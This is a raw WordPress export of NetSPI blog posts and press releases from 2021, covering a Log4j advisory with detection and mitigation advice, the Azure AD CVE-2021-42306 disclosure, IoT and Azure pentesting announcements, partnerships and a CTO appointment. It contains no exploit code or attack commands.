[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => threatpost-log4shell-is-spawning-even-nastier-mutations
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:11:01
[post_modified_gmt] => 2023-01-23 21:11:01
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26964
[menu_order] => 201
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[50] => WP_Post Object
(
[ID] => 26924
[post_author] => 91
[post_date] => 2021-12-10 17:01:28
[post_date_gmt] => 2021-12-10 23:01:28
[post_content] =>
Talk to any security professional and they’ll tell you that a vulnerability that allows for unauthenticated remote code execution is as about as critical as it gets. That’s exactly what CVE-2021-44228 allows.
On December 9, 2021, the severe Apache Log4j zero-day vulnerability was disclosed, along with its known exploits, creating a panic across the security community. The mere fact that a fix was put into place in a matter of hours of discovery is an indicator of how severe the vulnerability truly is. Given its severity, users are encouraged to take action immediately.
As teams scrambled to address CVE-2021-44228, a new vulnerability came about: CVE 2021-45046, as the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was deemed "incomplete in certain non-default configurations." It causes Log4j2 Thread Context Message Pattern and Context Lookup Pattern to be vulnerable to a Denial of Service (DoS) attack.
…And then yet another surfaced overnight, CVE-2021-45105. The third Log4j vulnerability is very similar to the initial Log4Shell zero-day. Previous patches did not protect against uncontrolled recursion from self-referential lookups which could also result in a DoS attack.
Continue reading for details on the impact of these critical vulnerabilities, guidance to determine whether your organization is at risk of Log4j exploit, and mitigation recommendations.
What is the impact of the Log4Shell zero-day vulnerability?
The ubiquity of Log4j is the greatest concern. In just 24 hours, it has been reported that Apple iCloud, Twitter, Cloudflare, Minecraft, and Steam, identified the vulnerability in their systems.
Its impact is expected to spread even further given Log4j is widely used across enterprise applications, including mobile applications, thick client applications, web applications, desktop GUI applications, and other Java-based applications to record/log activities within an application.
If exploited, cybercriminals can take control of an affected system remotely.
Is my organization vulnerable?
The first step to threat mitigation is to understand Log4j’s presence in your organization. To answer the question “Which of my applications use Log4j?” NetSPI recommends:
Searching code repositories for the following and setting them to the correct parameter value based on the CVE remediation recommendation.
"log4j2.formatMsgNoLookups"
"com.sun.jndi.rmi.object.trustURLCodebase"
"com.sun.jndi.cosnaming.object.trustURLCodebase"
Check your asset management database to see if you are running Apache Log4j2 versions ranging from 2.0 to 2.16 in your environment. If so, you are likely vulnerable and require an update, though there are some exceptions.
Check for affected versions of log4j jar files on file systems to prioritize systems that require further analysis.
If a software composition analysis (SCA) tool is being used, request the tool to develop a check for the vulnerability or create a custom check for the incorrect setting.
What can I do to protect my organization?
Review the Apache Log4j security vulnerability announcement and update to the appropriate version of Log4j 2. It is important to follow the mitigation steps outlined by Apache and continuously check in for additional vulnerable instances.
NetSPI also recommends organizations ensure their detection tools (Qualys, Nessus, Nexpose, etc.) produce checks for the vulnerability as this is likely to have lasting impacts.
[post_title] => Log4j: Is My Organization Impacted?
[post_excerpt] => Find out if your organization is vulnerable to the Log4j vulnerabilities, read about the impact of CVE-2021-44228 and its variants, and learn mitigation steps to take.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => log4j-vulnerability-impact
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:11:02
[post_modified_gmt] => 2023-01-23 21:11:02
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26924
[menu_order] => 202
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[51] => WP_Post Object
(
[ID] => 26938
[post_author] => 91
[post_date] => 2021-12-10 10:42:37
[post_date_gmt] => 2021-12-10 16:42:37
[post_content] =>
On December 10, 2021, NetSPI was featured in an article written by Help Net Security. Read the full article below or online here.
+++
NetSPI launched its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities.
With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.
NetSPI’s new IoT testing services encompass the following capabilities:
ATM penetration testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture.
Automotive penetration testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems – at any stage of automotive development.
Medical device penetration testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines.
Operational technology (OT) architecture and security review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation.
Embedded penetration testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device.
“IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI’s IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems,” said Aaron Shilts, President and CEO at NetSPI. “Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide.”
To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.
“IoT pentesting has become an important part of security strategy and business processes – especially given the increased connectedness in both personal and professional lives,” said Trowell. “There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI’s new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers.”
[post_title] => Help Net Security: NetSPI offers protection against cybersecurity threats with IoT penetration testing services
[post_excerpt] => On December 10, 2021, NetSPI was featured in an article written by Help Net Security.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => help-net-security-netspi-iot-penetration-testing
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:11:02
[post_modified_gmt] => 2023-01-23 21:11:02
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26938
[menu_order] => 203
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[52] => WP_Post Object
(
[ID] => 26936
[post_author] => 91
[post_date] => 2021-12-08 10:08:00
[post_date_gmt] => 2021-12-08 16:08:00
[post_content] =>
On December 8, 2021, NetSPI was featured in an article written by David Marshall for VMBlog.com. Read the full article below or online here.
+++
NetSPI announced the launch of its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities. With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.
NetSPI's new IoT testing services encompass the following capabilities:
ATM Penetration Testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture. Learn more about ATM pentesting.
Automotive Penetration Testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems - at any stage of automotive development. Learn more about automotive pentesting.
Medical Device Penetration Testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines. Learn more about medical device pentesting.
Operational Technology (OT) Architecture and Security Review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation. Learn more about OT architecture and security review.
Embedded Penetration Testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device. Learn more about embedded pentesting.
"IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI's IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems," said Aaron Shilts, President and CEO at NetSPI. "Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide."
To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.
"IoT pentesting has become an important part of security strategy and business processes - especially given the increased connectedness in both personal and professional lives," said Trowell. "There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI's new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers."
[post_title] => VMBlog.com: NetSPI Adds IoT Penetration Testing to its Suite of Offensive Security Services
[post_excerpt] => On December 8, 2021, NetSPI was featured in an article written by David Marshall for VMBlog.com.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => vmblog-netspi-adds-iot-penetration-testing-to-its-suite-of-offensive-security-services
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:11:02
[post_modified_gmt] => 2023-01-23 21:11:02
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26936
[menu_order] => 204
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[53] => WP_Post Object
(
[ID] => 26848
[post_author] => 91
[post_date] => 2021-12-08 07:00:00
[post_date_gmt] => 2021-12-08 13:00:00
[post_content] =>
Led by IoT security expert Larry Trowell, the IoT pentesting services focus on securing ATMs, automotive, medical devices, operational technology, and other embedded systems.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities. With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.
NetSPI’s new IoT testing services encompass the following capabilities:
ATM Penetration Testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture. Learn more about ATM pentesting.
Automotive Penetration Testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems – at any stage of automotive development. Learn more about automotive pentesting.
Medical Device Penetration Testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines. Learn more about medical device pentesting.
Operational Technology (OT) Architecture and Security Review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation. Learn more about OT architecture and security review.
Embedded Penetration Testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device. Learn more about embedded pentesting.
“IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI’s IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems," said Aaron Shilts, President and CEO at NetSPI. "Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide."
To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.
“IoT pentesting has become an important part of security strategy and business processes – especially given the increased connectedness in both personal and professional lives,” said Trowell. “There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI’s new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers.”
To learn more about NetSPI’s IoT security capabilities, visit the NetSPI website.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Adds IoT Penetration Testing to its Suite of Offensive Security Services
[post_excerpt] => Learn about NetSPI’s IoT security services, including ATM, automotive, medical devices, operational technology (OT), and embedded system penetration testing services.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-adds-iot-penetration-testing-offensive-security-services
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:11:04
[post_modified_gmt] => 2023-01-23 21:11:04
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26848
[menu_order] => 207
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[54] => WP_Post Object
(
[ID] => 26751
[post_author] => 91
[post_date] => 2021-11-30 07:00:15
[post_date_gmt] => 2021-11-30 13:00:15
[post_content] =>
Co-authored by two of the world’s foremost experts on Azure cybersecurity, the book explores how to perform successful pentesting and risk assessment of Microsoft Azure environments.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of Penetration Testing Azure for Ethical Hackers, a book co-authored by NetSPI practice director Karl Fosaaen and global cloud security consultant David Okeyode. Written to provide security professionals hands-on lessons and tips for successful Azure penetration testing, the book serves as a resource for industry professionals to simulate real-world Azure attacks and learn how to better identify vulnerabilities.
To keep sensitive data secure as businesses migrate from on-premise environments to the cloud, pentesting has become a necessity for all organizations operating in Microsoft Azure. This investment ensures that organizations have consistent visibility into security gaps in cloud infrastructures, and provides actionable guidance to remediate vulnerabilities and improve organizations’ overall cloud security posture.
“The cloud is top of mind for nearly all of today’s security professionals and will continue to be a vital aspect to IT spend,” said author Karl Fosaaen, practice director at NetSPI. “This book provides a digestible framework for professionals of all levels to better understand pentesting within Azure environments. It offers hands-on exercises for readers to test their skills and learn key pentesting techniques that are crucial to successfully assess Azure environments in today’s ecosystem.”
Penetration Testing Azure for Ethical Hackers takes readers through the prerequisites for Azure penetration testing, while also giving step-by-step instructions on how to set up a pentesting lab. Readers will also learn how to simulate an attack on Azure assets –– demonstrating the techniques and methodologies an attacker uses to gain persistent access to cloud environments.
“With the rapid acceleration to cloud-based environments and increased gaps in Azure security implementations, penetration testing is becoming an increasingly important skill for security professionals to utilize,” said David Okeyode, co-author and EMEA chief technology officer, Azure Cloud at Palo Alto Networks. “IT teams will come to understand how hackers attack resources hosted within Azure, learn how to effectively protect their environments from these threats, and extend their current pentesting skill sets and capabilities.”
Order Penetration Testing Azure for Ethical Hackersnow on Amazon. To learn more about NetSPI’s Azure cloud penetration testing capabilities, visit the NetSPI website.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Practice Director Publishes Azure Penetration Testing Book for Ethical Hackers
[post_excerpt] => Learn about Azure cloud penetration testing in this book written by NetSPI practice director Karl Fosaaen.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-karl-fosaaen-publishes-azure-penetration-testing-book
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:42
[post_modified_gmt] => 2022-12-16 16:51:42
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26751
[menu_order] => 212
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[55] => WP_Post Object
(
[ID] => 26705
[post_author] => 91
[post_date] => 2021-11-18 12:30:11
[post_date_gmt] => 2021-11-18 18:30:11
[post_content] =>
On November 18, 2021, NetSPI was featured in an article written by Ionut Arghire for SecurityWeek. Read the full article below or online here.
Microsoft on Wednesday informed customers about a recently patched information disclosure vulnerability affecting Azure Active Directory (AD).
Tracked as CVE-2021-42306 (CVSS score of 8.1), the vulnerability exists because of the manner in which Automation Account “Run as” credentials are created when a new Automation Account is set up in Azure.
Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and could be accessed by anyone with access to information on App Registrations. An attacker could use these credentials to authenticate as the App Registration.
Security researchers with enterprise penetration testing firm NetSPI, who identified the vulnerability, explain that an attacker could leverage the bug to escalate privileges to Contributor of any subscription that has an Automation Account, and access resources in the affected subscriptions.
“This includes credentials stored in key vaults and any sensitive information stored in Azure services used in the subscription. Or worse, they could disable or delete resources and take entire Azure tenants offline,” the researchers explain.
According to Microsoft, the vulnerability is related to the keyCredentials property, which was designed for configuring authentication credentials for applications, and which accepts a certificate containing public key data for authentication, but which also incorrectly stored such certificates.
“Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data,” Microsoft says.
The tech giant says it has addressed the bug by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been incorrectly stored in clear text.
“As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property,” the company says.
Microsoft also notes that all Automation Run As accounts that have been created using Azure Automation self-signed certificates between October 15, 2020, and October 15, 2021, are affected by the issue. Azure Migrate services and customers who deployed the preview version of VMware to Azure DR experience with Azure Site Recovery (ASR) might also be affected.
Thus, Azure AD customers should cycle through all Automation Account “Run as” certificates to make sure no credentials are exposed.
[post_title] => SecurityWeek: Microsoft Informs Users of High-Severity Vulnerability in Azure AD
[post_excerpt] => On November 18, 2021, NetSPI was featured in an article written by Ionut Arghire for SecurityWeek.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => securityweek-microsoft-informs-users-of-high-severity-vulnerability-in-azure-ad
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:45
[post_modified_gmt] => 2022-12-16 16:51:45
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26705
[menu_order] => 220
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[56] => WP_Post Object
(
[ID] => 26697
[post_author] => 91
[post_date] => 2021-11-17 14:11:54
[post_date_gmt] => 2021-11-17 20:11:54
[post_content] =>
The vulnerability, found by NetSPI’s cloud pentesting practice director Karl Fosaaen, affects most organizations that use Azure.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today recognizes the work of practice director Karl Fosaaen who discovered and reported a critical misconfiguration in Microsoft Azure. If exploited by an adversary, CVE-2021-42306: CredManifest would allow bad actors to escalate up to a Contributor role in the Azure Active Directory subscription. If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription.
Because Azure Active Directory enables employees to sign in and access resources, if the issue was not identified by NetSPI and a malicious individual found the vulnerability first, they would have the potential to access all of the resources in the affected subscriptions. This includes credentials stored in key vaults and any sensitive information stored in Azure services used in the subscription. Or worse, they could disable or delete resources and take entire Azure tenants offline. This would leave organizations without access to external resources that are hosted in the vulnerable subscription, including applications hosted by App services, public files from Storage Accounts, or databases hosted in AzureSQL.
“The scope of this issue is wide-sweeping, given the prominence of “Run as” accounts in Azure and the growing adoption of Azure. We’re proud to have identified and fixed it before the bad guys,” said Fosaaen. “The discovery of this vulnerability highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test.”
“We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe,” said a representative from MSRC. Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation. Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored. Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal.
Although Microsoft has updated the impacted Azure services, NetSPI recommends cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.
A technical explanation of the vulnerability, how it was found, its impact, and remediation steps, can be found on the NetSPI technical blog. To connect with NetSPI for Azure cloud penetration services, visit NetSPI.com.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact: Amanda Echavarri, Inkhouse for NetSPI netspi@inkhouse.com (978) 201-2510
Dubai, UAE and Minneapolis, Minnesota – SecureLink, the Trusted Risk Advisor and subsidiary of StarLink signed distribution agreement with NetSPI, a leader in Enterprise Security Testing and Attack Surface Management, for the MEA region.
Pioneers in penetration testing, NetSPI is changing the pentesting scenario to make it easier for enterprises to track trends and improve their vulnerability management program. The Technical Assessments include Web Application Penetration Testing, Mobile Application Penetration Testing, Source Code Review, Infrastructure Vulnerability Assessment, Red Teaming, and Breach and Attack Simulation.
Through this partnership, NetSPI can capitalize on SecureLink’s consultancy, sales, and marketing expertise, utilize the direct connect with decision-makers in their extensive customer base to create and convert opportunities for Cybersecurity Testing Services provided by NetSPI as well as take advantage of the years of trust built by SecureLink in this region.
Manish Pardeshi, Director, SecureLink commented that, “We are privileged to onboard NetSPI in our ecosystem that can offer our customers a more continuous and scalable assessment of their environment with NetSPI’s Penetration Testing as a Service (PTaaS) and ensure real-time visibility and full control over the testing program.”
"We are proud to announce our partnership with SecureLink, the well-established cybersecurity leader in the MEA region. Together we will transform the cybersecurity testing industry with NetSPI’s technology-enabled services and expertise," said Aaron Shilts President and CEO at NetSPI. "In partnership with SecureLink, multinational enterprises in MEA now have access to NetSPI’s penetration testing and adversary simulation services to test their applications, networks, and cloud at scale and better manage their expanding attack surface. The sophistication, methodology, and value, provided by SecureLink and NetSPI is unmatched."
About SecureLink
SecureLink is a risk advisory firm headquartered in Dubai, UAE, and part of the StarLink Group of companies that has a turnover of USD 500 Million, over 375 employees and presence in 20 countries in the META region, including UK and USA. SecureLink is an independent advisory firm assisting customers in identifying, mitigating, and managing their business risks. SecureLink provides comprehensive assessment of risks across People, Process & Technology and helps with the right governance frameworks to ensure that risks are continuously monitored and acted upon. SecureLink offers these services via its partner community to develop frameworks and implement platforms for automation of governance, risk, and compliance requirements. For more information about SecureLink, please visit www.securelinkme.net
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => SecureLink and NetSPI partner to enable enterprises to manage their attack surface with tech-enabled penetration testing services
[post_excerpt] => Learn about SecureLink and NetSPI's distribution agreement which will provide attack surface management and enterprise pentesting services to the Middle East and Africa (MEA) region.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => securelink-netspi-partnership-penetration-testing-services
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:47
[post_modified_gmt] => 2022-12-16 16:51:47
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26594
[menu_order] => 227
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[58] => WP_Post Object
(
[ID] => 26390
[post_author] => 91
[post_date] => 2021-09-14 08:00:00
[post_date_gmt] => 2021-09-14 13:00:00
[post_content] =>
Tel Aviv and Minneapolis, Minnesota – Apiiro, the industry’s first Code Risk Platform™, and NetSPI, the leader in penetration testing and attack surface management, today announced a strategic partnership to combine Apiiro's comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS). The partnership enables contextual and risk-based application security testing for its mutual customers.
Organizations rely on penetration testing for releasing and maintaining secure applications. As a result of the partnership, NetSPI customers will be able to test their applications, networks, and cloud infrastructure at scale and manage their attack surfaces using risk visibility and context provided by Apiiro. NetSPI’s PTaaS will be supported by Apiiro’s comprehensive view of security and compliance risks and keen understanding of how to manage the complexities of a risk-based Secure Software Development Lifecycle (SSDLC).
To keep pace with the speed of software development today, both companies advocate for running penetration tests in a smart and consistent way. Instead of performing pentests on a set schedule, they should be performed continuously as high risk changes are identified in an environment. Apiiro helps focus pentests on material changes to application and infrastructure code, enabling organizations to target their security processes. Through this contextual approach to application pentesting, customers can better automate the testing process and identify business-critical security vulnerabilities.
“Apiiro is pleased to be joining forces with NetSPI to provide our customers with next-gen context aware pen-testing capabilities that will reduce the friction between pen-testers and development teams and help deliver secure products faster. ” said Idan Plotnik, CEO at Apiiro. “We were impressed by NetSPI’s ability to swiftly identify areas of critical vulnerabilities, and deliver high quality results that allow their customers to have peace of mind and focus on their business priorities.”
“Applications are the lifeblood of organizations today. As application development accelerates, the way we approach security testing needs to evolve,” said Aaron Shilts, President and CEO at NetSPI. “NetSPI and Apiiro are changing the way security teams approach penetration testing. By providing real-time visibility into application attack surface changes, we can better enable continuous and contextual testing to help clients find, fix, and remediate their vulnerabilities faster.”
About Apiiro
Apiiro is the industry's first Code Risk Platform™ to provide Application Risk Management with every change, from design to code to cloud. Apiiro is re-inventing the secure development lifecycle for Agile and cloud-native development and gives organizations a 360° view of security and compliance risks, from design to production, across applications, infrastructure, developers' knowledge, and business impact. Apiiro is backed by Greylock and Kleiner Perkins. www.apiiro.com
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => Apiiro and NetSPI Partner to Provide Contextual, Risk-Based Penetration Testing
[post_excerpt] => Want contextual, risk-based pentesting? Read about the strategic partnership to combine Apiiro's comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS).
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => apiiro-netspi-partnership-contextual-risk-based-penetration-testing
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:54
[post_modified_gmt] => 2022-12-16 16:51:54
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26390
[menu_order] => 245
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[59] => WP_Post Object
(
[ID] => 26216
[post_author] => 91
[post_date] => 2021-08-18 08:00:00
[post_date_gmt] => 2021-08-18 13:00:00
[post_content] =>
As CTO, Travis will drive penetration testing, adversary simulation, and attack surface management product strategy to support clients and services teams.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Travis Hoyt as its new Chief Technology Officer (CTO). In his new role, Travis is responsible for enhancing and expanding NetSPI’s technology-enabled services portfolio.
Travis brings over 20 years of cybersecurity leadership experience to NetSPI, previously leading security programs for major financial institutions, including Bank of America and TIAA, where he focused on application security and technology-enabled control transformation. Embracing innovation, he has built and patented two technologies from scratch – a vulnerability assessment and management platform and a posture management solution – well before the market.
“The client perspective and spirit of innovation Travis adds to our team is invaluable to our business and the success of our clients,” said Aaron Shilts, President and CEO at NetSPI. “Travis has a track record of bringing the vision, design, and execution of technologies to life. With his leadership, we are eager to continue disrupting the historically-stagnant pentesting and vulnerability management space.”
“The quality of the NetSPI team and their reputation for innovation is unmatched in the penetration testing industry,” said Travis. “As CTO I’m excited to provide immediate input into the product roadmap and help the team recognize what we need to do to provide the most value to our clients. Looking to the future, I’m eager to start exploring the next generation architecture that will drive the industry forward.”
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
As a part of a risk-based vulnerability management program, organizations can leverage NetSPI’s risk scoring for industry benchmarking, prioritization of security activities, and more.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the addition of risk scoring to its ResolveTM penetration testing and vulnerability management platform. In conjunction with Penetration Testing as a Service (PTaaS), NetSPI’s risk scoring intelligence helps its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business.
